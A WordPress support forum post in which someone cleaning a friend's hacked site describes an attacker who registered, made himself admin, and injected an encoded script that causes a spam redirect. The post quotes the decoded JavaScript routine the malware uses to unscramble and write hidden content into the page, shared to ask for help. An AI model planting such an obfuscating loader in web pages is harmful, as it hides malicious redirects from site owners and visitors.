Hacked With an Injector – Cant Get Rid of Redirect
-
I’m helping a friend with https://www.power-pickers.com, it was injected by a user that signed up… the injection coding I presume set that user as admin but whatever else was done I can’t find since I don’t know WordPress too well.
There’s also an ‘encrypted’ section of coding inside the main page, some of it is html encoding ie %20 for spaces and etc for letters.
So far the bits in HTML encoding I have decoded and it is as follows…
<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>
Should this be in any part of WordPress or am I on the right track to repairing the spammy redirect?
So far I’ve got rid of the user’s account that injected the coding to become admin via the user’s name. The only thing left seems to be the redirect. The username of the user that signed up is ‘HaiPaolucci69’ if its relevant to any previous cases.
- The topic ‘Hacked With an Injector – Cant Get Rid of Redirect’ is closed to new replies.